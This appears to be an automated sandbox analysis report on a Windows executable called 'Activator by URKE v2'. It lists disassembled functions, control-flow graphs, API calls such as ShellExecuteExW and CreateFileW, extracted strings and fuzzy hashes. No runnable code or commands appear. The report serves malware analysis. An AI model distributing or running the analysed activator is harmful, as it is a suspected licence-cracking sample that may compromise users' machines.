                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2087 7ff7e5f13030-7ff7e5f13073 2088 7ff7e5f13079-7ff7e5f130b5 call 7ff7e5f174c0 2087->2088 2089 7ff7e5f133e4-7ff7e5f13409 call 7ff7e5ef1b70 call 7ff7e5f15c30 2087->2089 2095 7ff7e5f130b7 2088->2095 2096 7ff7e5f130ba-7ff7e5f130c1 2088->2096 2095->2096 2098 7ff7e5f130d2-7ff7e5f130d6 2096->2098 2099 7ff7e5f130c3-7ff7e5f130c7 2096->2099 2102 7ff7e5f130d8 2098->2102 2103 7ff7e5f130db-7ff7e5f130e6 2098->2103 2100 7ff7e5f130c9 2099->2100 2101 7ff7e5f130cc-7ff7e5f130d0 2099->2101 2100->2101 2101->2103 2102->2103 2104 7ff7e5f13178 2103->2104 2105 7ff7e5f130ec 2103->2105 2107 7ff7e5f1317c-7ff7e5f1317f 2104->2107 2106 7ff7e5f130f2-7ff7e5f130f9 2105->2106 2108 7ff7e5f130fb 2106->2108 2109 7ff7e5f130fe-7ff7e5f13103 2106->2109 2110 7ff7e5f13187-7ff7e5f1318a 2107->2110 2111 7ff7e5f13181-7ff7e5f13185 2107->2111 2108->2109 2112 7ff7e5f13135-7ff7e5f13140 2109->2112 2113 7ff7e5f13105 2109->2113 2114 7ff7e5f131b0-7ff7e5f131c3 call 7ff7e5ef7b68 2110->2114 2115 7ff7e5f1318c-7ff7e5f13193 2110->2115 2111->2110 2111->2114 2119 7ff7e5f13142 2112->2119 2120 7ff7e5f13145-7ff7e5f1314a 2112->2120 2116 7ff7e5f1311a-7ff7e5f13120 2113->2116 2132 7ff7e5f131e8-7ff7e5f1323d call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef587c call 7ff7e5ef1b70 2114->2132 2133 7ff7e5f131c5-7ff7e5f131e3 call 7ff7e5f00aa0 2114->2133 2115->2114 2117 7ff7e5f13195-7ff7e5f131ac 2115->2117 2121 7ff7e5f13107-7ff7e5f1310e 2116->2121 2122 7ff7e5f13122 2116->2122 2117->2114 2119->2120 2124 7ff7e5f1340a-7ff7e5f13411 2120->2124 2125 7ff7e5f13150-7ff7e5f13157 2120->2125 2130 7ff7e5f13110 2121->2130 2131 7ff7e5f13113-7ff7e5f13118 2121->2131 2122->2112 2128 7ff7e5f13413 2124->2128 2129 7ff7e5f13416-7ff7e5f1341b 2124->2129 2126 7ff7e5f13159 2125->2126 2127 7ff7e5f1315c-7ff7e5f13162 2125->2127 2126->2127 2127->2124 2135 7ff7e5f13168-7ff7e5f13172 2127->2135 2128->2129 2136 7ff7e5f1341d-7ff7e5f13424 2129->2136 2137 7ff7e5f1342e-7ff7e5f13436 2129->2137 2130->2131 2131->2116 2138 7ff7e5f13124-7ff7e5f1312b 2131->2138 2154 7ff7e5f1323f-7ff7e5f1328d call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef72ac call 7ff7e5ef1b70 2132->2154 2155 7ff7e5f13292-7ff7e5f1329f ShellExecuteExW 2132->2155 2133->2132 2135->2104 2135->2106 2141 7ff7e5f13429 2136->2141 2142 7ff7e5f13426 2136->2142 2143 7ff7e5f13438 2137->2143 2144 7ff7e5f1343b-7ff7e5f13446 2137->2144 2145 7ff7e5f1312d 2138->2145 2146 7ff7e5f13130 2138->2146 2141->2137 2142->2141 2143->2144 2144->2107 2145->2146 2146->2112 2154->2155 2156 7ff7e5f132a5-7ff7e5f132af 2155->2156 2157 7ff7e5f13396-7ff7e5f1339e 2155->2157 2159 7ff7e5f132bf-7ff7e5f132c2 2156->2159 2160 7ff7e5f132b1-7ff7e5f132b4 2156->2160 2161 7ff7e5f133a0-7ff7e5f133b6 2157->2161 2162 7ff7e5f133d2-7ff7e5f133df 2157->2162 2165 7ff7e5f132de-7ff7e5f132f1 WaitForInputIdle call 7ff7e5f13928 2159->2165 2166 7ff7e5f132c4-7ff7e5f132cf IsWindowVisible 2159->2166 2160->2159 2164 7ff7e5f132b6-7ff7e5f132bd 2160->2164 2167 7ff7e5f133b8-7ff7e5f133cb 2161->2167 2168 7ff7e5f133cd call 7ff7e5f15b1c 2161->2168 2162->2089 2164->2159 2170 7ff7e5f13333-7ff7e5f13340 CloseHandle 2164->2170 2176 7ff7e5f132f6-7ff7e5f132fd 2165->2176 2166->2165 2171 7ff7e5f132d1-7ff7e5f132dc ShowWindow 2166->2171 2167->2168 2173 7ff7e5f1344b-7ff7e5f13453 call 7ff7e5f1ae94 2167->2173 2168->2162 2179 7ff7e5f13342-7ff7e5f13353 call 7ff7e5f00aa0 2170->2179 2180 7ff7e5f13355-7ff7e5f1335c 2170->2180 2171->2165 2176->2170 2184 7ff7e5f132ff-7ff7e5f13302 2176->2184 2179->2180 2182 7ff7e5f1337e-7ff7e5f13380 2179->2182 2180->2182 2183 7ff7e5f1335e-7ff7e5f13361 2180->2183 2182->2157 2189 7ff7e5f13382-7ff7e5f13385 2182->2189 2183->2182 2188 7ff7e5f13363-7ff7e5f13378 2183->2188 2184->2170 2190 7ff7e5f13304-7ff7e5f13315 GetExitCodeProcess 2184->2190 2188->2182 2189->2157 2193 7ff7e5f13387-7ff7e5f13395 ShowWindow 2189->2193 2190->2170 2194 7ff7e5f13317-7ff7e5f1332c 2190->2194 2193->2157 2194->2170
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID: .exe$.inf$Install$p
                                                                                                                                                                                                                                                  • API String ID: 148627002-3607691742
                                                                                                                                                                                                                                                  • Opcode ID: 6f440de831e1c5c686922ce4650cfc8146a03bf6daadfd87cf7eb597da0a0adc
                                                                                                                                                                                                                                                  • Instruction ID: 9cfa57a58b715af13fcd79a9c1fa34715ed74cc62bb99320344e9f73102f6642
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f440de831e1c5c686922ce4650cfc8146a03bf6daadfd87cf7eb597da0a0adc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26C19361F0864A85FB00EB65D6643FDB7A1AF85F80F844037CA4D876A6DF3CE5618322
                                                                                                                                                                                                                                                  Function 00007FF7E5F12BF4 Relevance: 16.6, APIs: 11, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3569833718-0
                                                                                                                                                                                                                                                  • Opcode ID: 6763192ddb5e5e657e4554a28dfd6506e17538323eb7aa5c2a47039c1bafdecd
                                                                                                                                                                                                                                                  • Instruction ID: 8f6029501e60075a1b38333d994ad778c171127245d7fef6d8d9e8634f0fa95b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6763192ddb5e5e657e4554a28dfd6506e17538323eb7aa5c2a47039c1bafdecd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3141C075B14A4A86F710AF61E820BEE6360EB49F98FC44133DD0A87B95CE3DD945C721
                                                                                                                                                                                                                                                  Function 00007FF7E5F0218C Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 7COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2237 7ff7e5f0218c-7ff7e5f0219f call 7ff7e5f157cc
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                                                                                                                                                                                                                                  • API String ID: 909987262-704999473
                                                                                                                                                                                                                                                  • Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                                                                                                  • Instruction ID: e22272adb9c70ce865ed14a415b21ac2e2a373e2aa1d3dfc332f45dcfdb0725c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24B0126C90414FD1D13CB780C8A21E44310CF14F00ED00C32D31CCFC524D3874424613
                                                                                                                                                                                                                                                  Function 00007FF7E5EF46A0 Relevance: 9.2, APIs: 6, Instructions: 164filetimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2291 7ff7e5ef46a0-7ff7e5ef46db 2292 7ff7e5ef46e6 2291->2292 2293 7ff7e5ef46dd-7ff7e5ef46e4 2291->2293 2294 7ff7e5ef46e9-7ff7e5ef4758 2292->2294 2293->2292 2293->2294 2295 7ff7e5ef475d-7ff7e5ef4788 CreateFileW 2294->2295 2296 7ff7e5ef475a 2294->2296 2297 7ff7e5ef478e-7ff7e5ef47be GetLastError call 7ff7e5ef80b0 2295->2297 2298 7ff7e5ef4868-7ff7e5ef486d 2295->2298 2296->2295 2307 7ff7e5ef47c0-7ff7e5ef480a CreateFileW GetLastError 2297->2307 2308 7ff7e5ef480c 2297->2308 2299 7ff7e5ef4873-7ff7e5ef4877 2298->2299 2301 7ff7e5ef4885-7ff7e5ef4889 2299->2301 2302 7ff7e5ef4879-7ff7e5ef487c 2299->2302 2305 7ff7e5ef48af-7ff7e5ef48c3 2301->2305 2306 7ff7e5ef488b-7ff7e5ef488f 2301->2306 2302->2301 2304 7ff7e5ef487e 2302->2304 2304->2301 2310 7ff7e5ef48c5-7ff7e5ef48d0 2305->2310 2311 7ff7e5ef48ec-7ff7e5ef4915 call 7ff7e5f15c30 2305->2311 2306->2305 2309 7ff7e5ef4891-7ff7e5ef48a9 SetFileTime 2306->2309 2312 7ff7e5ef4812-7ff7e5ef481a 2307->2312 2308->2312 2309->2305 2316 7ff7e5ef48d2-7ff7e5ef48da 2310->2316 2317 7ff7e5ef48e8 2310->2317 2313 7ff7e5ef4853-7ff7e5ef4866 2312->2313 2314 7ff7e5ef481c-7ff7e5ef4833 2312->2314 2313->2299 2318 7ff7e5ef4835-7ff7e5ef4848 2314->2318 2319 7ff7e5ef484e call 7ff7e5f15b1c 2314->2319 2321 7ff7e5ef48df-7ff7e5ef48e3 call 7ff7e5ef1c80 2316->2321 2322 7ff7e5ef48dc 2316->2322 2317->2311 2318->2319 2324 7ff7e5ef4916-7ff7e5ef491b call 7ff7e5f1ae94 2318->2324 2319->2313 2321->2317 2322->2321
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3536497005-0
                                                                                                                                                                                                                                                  • Opcode ID: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                                                                                                                                                                                                                                  • Instruction ID: e0c95263796b9bb5901ea18848d014c1156da09d23f5431a859c9d7daf634006
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2612766A0878581E7209B29F51036EA7A1FB84BB8F900336DFAD47AD4CF3DD064C715
                                                                                                                                                                                                                                                  Function 00007FF7E5EFE7C0 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2092733347-0
                                                                                                                                                                                                                                                  • Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                                                                                                  • Instruction ID: 4ba00c73a65db2e1553b77f9a57a2aadd1b5bb98d8d1d7f231c4b584728caa93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E314866B10655CEFB00DFB5E8902EC7770FB08B58B94502AEE4DA7A58EF38D495C321
                                                                                                                                                                                                                                                  Function 00007FF7E5F0EB64 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadBitmapW.USER32 ref: 00007FF7E5F0EB7A
                                                                                                                                                                                                                                                  • GetObjectW.GDI32 ref: 00007FF7E5F0EBAB
                                                                                                                                                                                                                                                  • DeleteObject.GDI32 ref: 00007FF7E5F0EBE5
                                                                                                                                                                                                                                                  • DeleteObject.GDI32 ref: 00007FF7E5F0EC15
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C279
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C295
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C2AF
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C2C1
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalAlloc.KERNEL32 ref: 00007FF7E5F0C2E2
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalLock.KERNEL32 ref: 00007FF7E5F0C2F7
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: CreateStreamOnHGlobal.COMBASE ref: 00007FF7E5F0C324
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7E5F0C3A5
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalUnlock.KERNEL32 ref: 00007FF7E5F0C3C8
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalFree.KERNEL32 ref: 00007FF7E5F0C3D1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                                                                  • String ID: ]
                                                                                                                                                                                                                                                  • API String ID: 1797374341-3352871620
                                                                                                                                                                                                                                                  • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                  • Instruction ID: d301df52925db54233d92239ebf026c284fe5f9fe2c761684859ba31c16d50b8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C119661B0D64A42EA10BB5196743F9E391AF88FC8F8C0036DE4D87B85DE3CE9048722
                                                                                                                                                                                                                                                  Function 00007FF7E5EF5DB8 Relevance: 7.7, APIs: 5, Instructions: 163filetimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2361 7ff7e5ef5db8-7ff7e5ef5df8 2362 7ff7e5ef5e02 2361->2362 2363 7ff7e5ef5dfa-7ff7e5ef5e00 2361->2363 2364 7ff7e5ef5e05-7ff7e5ef5e08 2362->2364 2363->2362 2363->2364 2365 7ff7e5ef5e12 2364->2365 2366 7ff7e5ef5e0a-7ff7e5ef5e10 2364->2366 2367 7ff7e5ef5e15-7ff7e5ef5e18 2365->2367 2366->2365 2366->2367 2368 7ff7e5ef5e22 2367->2368 2369 7ff7e5ef5e1a-7ff7e5ef5e20 2367->2369 2370 7ff7e5ef5e25-7ff7e5ef5e33 call 7ff7e5ef5890 2368->2370 2369->2368 2369->2370 2373 7ff7e5ef5e35-7ff7e5ef5e38 2370->2373 2374 7ff7e5ef5e48-7ff7e5ef5e4a 2370->2374 2373->2374 2375 7ff7e5ef5e3a-7ff7e5ef5e46 call 7ff7e5ef5ff4 2373->2375 2376 7ff7e5ef5e4d-7ff7e5ef5e55 2374->2376 2375->2376 2378 7ff7e5ef5e5a-7ff7e5ef5e89 CreateFileW 2376->2378 2379 7ff7e5ef5e57 2376->2379 2380 7ff7e5ef5e8f-7ff7e5ef5eb6 call 7ff7e5ef80b0 2378->2380 2381 7ff7e5ef5f4c-7ff7e5ef5f4f 2378->2381 2379->2378 2393 7ff7e5ef5eee-7ff7e5ef5ef6 2380->2393 2394 7ff7e5ef5eb8-7ff7e5ef5eea CreateFileW 2380->2394 2384 7ff7e5ef5f51-7ff7e5ef5f59 call 7ff7e5efe734 2381->2384 2385 7ff7e5ef5f5e-7ff7e5ef5f61 2381->2385 2384->2385 2388 7ff7e5ef5f63-7ff7e5ef5f6a call 7ff7e5efe734 2385->2388 2389 7ff7e5ef5f6f-7ff7e5ef5f72 2385->2389 2388->2389 2391 7ff7e5ef5f74-7ff7e5ef5f7c call 7ff7e5efe734 2389->2391 2392 7ff7e5ef5f81-7ff7e5ef5fbf SetFileTime CloseHandle 2389->2392 2391->2392 2396 7ff7e5ef5fc1-7ff7e5ef5fc7 call 7ff7e5ef5ff4 2392->2396 2397 7ff7e5ef5fcc-7ff7e5ef5feb call 7ff7e5f15c30 2392->2397 2398 7ff7e5ef5f2e-7ff7e5ef5f46 2393->2398 2399 7ff7e5ef5ef8-7ff7e5ef5f0e 2393->2399 2394->2393 2396->2397 2398->2381 2398->2397 2401 7ff7e5ef5f10-7ff7e5ef5f23 2399->2401 2402 7ff7e5ef5f29 call 7ff7e5f15b1c 2399->2402 2401->2402 2404 7ff7e5ef5fec-7ff7e5ef5ff3 call 7ff7e5f1ae94 2401->2404 2402->2398
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2398171386-0
                                                                                                                                                                                                                                                  • Opcode ID: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                                                                                                                                                                                                                                  • Instruction ID: fbb733c6b1b111da9626433ae8e97f971b2d794915c57e2fa4e15a886a0a8504
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851F662B18B4659FB60EB65E5203BCA361BB54B98FC04633DE5D8A7D4DF3890258321
                                                                                                                                                                                                                                                  Function 00007FF7E5F0E96C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1266772231-0
